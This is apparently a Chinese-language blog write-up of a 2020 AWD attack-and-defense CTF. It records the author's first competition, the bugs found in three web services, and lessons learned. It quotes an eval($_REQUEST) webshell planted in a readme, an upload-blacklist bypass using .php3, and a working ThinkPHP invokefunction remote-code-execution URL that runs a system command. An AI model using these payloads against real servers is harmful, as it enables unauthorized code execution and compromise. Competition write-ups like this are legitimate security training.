第一次打awd,收获颇丰,让我充分看到了自己的短板。以下做个简短的记录。.
2020.3 awd记录
第一次打awd,收获颇丰,让我充分看到了自己的短板。以下做个简短的记录。
团队分配的任务是负责运维,在做完了dump源码的工作并发给队友之后,因为人员紧张,我又去打payload
web2
作为第一个开启的容器,也是相对简单,在login.php直接访问就有flag,贴上源码
1 | <input type="hiddent" value= |
还有这里 admin下的index.php
1 | $uname = addslashes( $_SESSION['username']); |
admin下的upload处可以直接上马php3
1 | $black_list = ["ini","htacces","php","ph3","html"]; |
web2获取flag脚本
1 | # -*- coding: utf-8 -*- |
web3
打开发现readme.md里面有一个马
1 | eval($_REQUEST[1]); @ |
看师傅们的代码提示
寻找文件包含的点,在org/smarty/sysplugins/smarty_internal_cacheresource_file.php
1 | $_smarty_tpl = $_template; |
还有一个弱口令,直接adminadmin就能登陆,也需要修复
web1
直接打payload
1 | http://39.100.119.37:10580/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag |
web1获取flag脚本
1 | # -*- coding: utf-8 -*- |
总结
- 脚本准备十分不充分,负责打payload交flag,没有准备自动交flag脚本,自己匆忙写的一直错误,后来check速度变快之后,提交flag速度跟不上,根本没有时间写脚本。最后还是靠着电脑师傅的脚本才缓解了一下。
- 对于漏洞的发掘能力还有待提高,虽然发现了一些点,但是早在我之前,师傅们就已经发现了,甚至已经修复了。我要提高自己的反应能力和代码审计能力。下一阶段准备开始审计cms来提高。
- 需要像师傅们学习,准备更多的waf和流量监控 文件监控等
- 没有准备好扫描文件的工具,seay在比赛中突然不能用了,只有d盾可以扫一扫,其他全靠手动,对于后门查找的效率有影响